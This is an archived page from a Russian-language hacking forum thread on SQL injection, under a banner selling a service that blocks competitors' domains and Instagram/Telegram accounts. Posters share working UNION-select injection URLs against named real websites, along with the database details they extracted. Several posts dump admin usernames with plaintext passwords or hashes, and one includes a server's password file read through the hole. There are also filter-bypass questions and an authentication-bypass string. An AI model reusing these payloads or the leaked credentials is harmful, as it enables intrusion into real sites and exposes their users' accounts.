УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 371 из 1242

371

Опции темы

Поиск в этой теме

Опции просмотра

#3701

14.11.2007, 09:30

K1nD[e]R

Участник форума

Регистрация: 16.06.2007

Сообщений: 133

Провел на форуме:
1877761

Репутация: 237

Отправить сообщение для K1nD[e]R с помощью ICQ

Код:

http://www.getsalt.com/news.php?id=-117+union+select+1,2,concat_ws(0x2F,version(),user(),database()),4,5,6,concat_ws(char(58,58),username,password,id),8,9,10,11,12+from+fb_users+limit+3,3/*

Данные : 5.0.22-log/getsalt@localhost/getsalt

Admins:
Login Password ID

Anneleen test123 2
kikivreeling vre27kik 19

#3702

14.11.2007, 10:49

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Отправить сообщение для fRg с помощью ICQ

Вопрос!
Сайт atdr.ro :

Код:

http://atdr.ro/index.php?id=-1/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11/*

Фильтрацию "+" обошёл, а вот concat никак не могу

Как обойти?
И ещё: при подборе таблиц странная реакция на запрос поля user_password из mysql.user
Кто копнёт глубже - отпишитесь (+)!

#3703

14.11.2007, 13:12

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

michaelyoun.com

Код:

http://michaelyoun.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user())/*

4.0.17-standard:michael132576:michael132576@bfb1.hotchill i.net
доступа к mysql нет

elmark.com.pl

Код:

http://www.elmark.com.pl/index.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/*

5.0.33-log:elmarkautomatyka:elmarkautomatyka@localhost

36 таблиц:

Код:

http://www.elmark.com.pl/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+35,1/*

по названиям таблиц ни админов, ни юзеров, ни другого интересного не нашёл

#3704

14.11.2007, 16:15

Elvis000

Moderator - Level 7

Регистрация: 23.04.2007

Сообщений: 646

Провел на форуме:
4901399

Репутация: 1035

Classifields - Универсальная бесплатная доска объявлений
http://www.classifields.ru/

Код:

http://www.classifields.ru/?field=999999999+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,version(),11,12,13,14,15+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*

Код:

COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
class_anekdotes
class_categories
class_links
clicker_ips_lasbber
documents
garbage_0
hotels_k
images_k
kigal_additional
kigal_backlinks
kigal_boxes
kigal_categories
kigal_pages
kigal_sites
lasbber_additional
lasbber_backlinks
lasbber_boxes
lasbber_categories
lasbber_pages
lasbber_sites
li_keywords
li_keywords_categories
links_p2
mail_answers
mail_answers_0
mail_categories
mail_questions
mail_questions_0
mail_users
markt_additional
markt_additional_temp
markt_backlinks
markt_boxes
markt_categories
markt_links
....
147 таблиц

user:catalog1@localhost
ver:5.1.16-beta
database:catalog1

прочитал: # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64

flogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin drug:*:1001:0:User &:/usr/home/drug:/usr/local/bin/bash mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin a47001:*:1002:1002:User &:/usr/home/a47001:/usr/local/bin/bash phpmyadmin:*:1003:1003:User &:/usr/home/phpmyadmin:/usr/local/bin/bash just:*:1004:1004:User &:/usr/home/just:/usr/local/bin/bash spellen:*:1005:1005:User &:/usr/home/spellen:/usr/local/bin/bash hedgehog:*:1006:1006:User &:/usr/home/hedgehog:/usr/local/bin/bash a47002:*:1007:1007:User &:/home/a47002:/bin/sh a47003:*:1008:1008:User &:/home/a47003:/bin/sh

Последний раз редактировалось Elvis000; 14.11.2007 в 17:18..

#3705

14.11.2007, 21:28

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

gamerslogik.com

Код:

http://www.gamerslogik.com/preview.php?PrevID=-29+union+select+1,2,concat_ws(char(58),version(),database(),user()),4,5,6,7,8+--+

5.0.24a-standard-log:gl_main:gamersl_malfoy@wilshire.dreamhost.com

Код:

http://www.gamerslogik.com/preview.php?PrevID=-29+union+select+1,2,concat_ws(char(58),username,user_password,user_icq),4,5,6,7,8+from+phpbb_users+limit+2,1+--+

Admin:
prfectjon:0f80a358117986ddb519d30b4b6c0993:lockhart
http://gamerslogik.com/phpbb2/

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#3706

14.11.2007, 22:03

halkfild

Leaders of Antichat - Level 4

Регистрация: 11.11.2005

Сообщений: 391

Провел на форуме:
7084941

Репутация: 2277

[talant.biz]
http://talant.biz/admin/about_vacancy.php?edit_vac=-36+union+select+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3A,VERSION(),USER(),DATABASE()),0x71),0x71),3, 4,5/*

4.1.11-Debian_4sarge2-log:stdimensiy_tal3@85.249.135.1:stdimensiy_tal3

при входе в админку
admin' or 1=1/*
sdsdsd

[docs.nexter.ru]
http://docs.nexter.ru/index.php?mode=1&part_id=111
/home/webadmin/nexter.ru/html/ghost/inc/
/home/webadmin/nexter.ru/html/ghost/admin/inc/files.inc.php
http://docs.nexter.ru/index.php?mode=1&part_id=7+order+by+3/*
http://docs.nexter.ru/news.php?id=3+order+by+4/*
версия 3-ка :'(
http://docs.nexter.ru/news.php?id=3+and+(ascii(substring(VERSION(),1,1)) =51)/*

[semi.com.ua]
/var/www/semi/semi.com.ua/whatis.php
http://www.semi.com.ua/whatis.php?ids=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7/*'
4.1.22:u_semi@localhost:semi

#3707

14.11.2007, 22:44

K1nD[e]R

Участник форума

Регистрация: 16.06.2007

Сообщений: 133

Провел на форуме:
1877761

Репутация: 237

тут не обсуждаются иные темы.....

#3708

15.11.2007, 00:22

FoxMALDER

Познающий

Регистрация: 26.07.2007

Сообщений: 50

Провел на форуме:
177050

Репутация: 62

Специально для будущих космонавтов

5.0.26-max-logacademyacademy@localhost

Код:

http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x05,version(),database(),user()),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86+from+information_schema.tables+limit+0,1/*
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86+from+information_schema.columns+limit+0,1/*

4.0.25-standardiwdpiwdp@localhost

Код:

http://www.iwdp.co.uk/profile.php?id=-34+union+select+1,concat_ws(0x05,version(),database(),user()),3,4,5,6,7,8,9,10,11/*
http://www.iwdp.co.uk/profile.php?id=-34+union+select+1,concat_ws(0x05,username,password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*

4.0.27inodeci000073_0001ci000073_0001@ubh01-out2.ubh.inode.at

Код:

http://www.cisci.net/competition.php?lang=-1+union+select+1,2,3,concat_ws(0x05,version(),database(),user()),5,6,7/*
http://www.cisci.net/user_info.php?lang=-1%20union%20select%201,2,3,concat_ws(0x05,user_name,password,email),5,6,7%20from%20user/*

4.0.27-standard-logdb206415585dbo206415585@74.208.16.93

Код:

http://restaurantway.com/index.php?smode=rest&type=1&parent=index&rest_id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x05,version(),database(),user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/*
http://restaurantway.com/index.php?smode=rest&type=1&parent=index&rest_id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x05,id,username,password,email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+t_user/*

Последний раз редактировалось FoxMALDER; 15.11.2007 в 05:48..

#3709

15.11.2007, 09:14

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

rokos.ru - инет-магазин

Код:

http://www.rokos.ru/product/suite_furniture/suite_98.html?template=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6/*

4.0.27-standard:rokosru_netcat:rokosru_netcat@localhost

nca.ru - концертное агенство

Код:

http://www.nca.ru/rus_concert.php?itemid=-1+union+select+1,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

4.1.11-Debian_4sarge5-log:t9700970_nca1:t9700970_nca1@85.249.135.11
Увы, но доступ к mysql прикрыт

#3710

15.11.2007, 13:45

je0n

Постоянный

Регистрация: 14.05.2006

Сообщений: 334

Провел на форуме:
1543521

Репутация: 272

Отправить сообщение для je0n с помощью ICQ

Цитата:

http://theplace.ru/news/news.php?id=-18864%20union%20select%201,2,3,4,5,version(),7,con cat(nick,char(58),email,char(58),passwd),9,10,11,1 2+from+busers+where+1+limit+73,1/*

а можно как-нить файл залить, если кавычка фильтруется?

Страница 371 из 1242

371

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)

Быстрый переход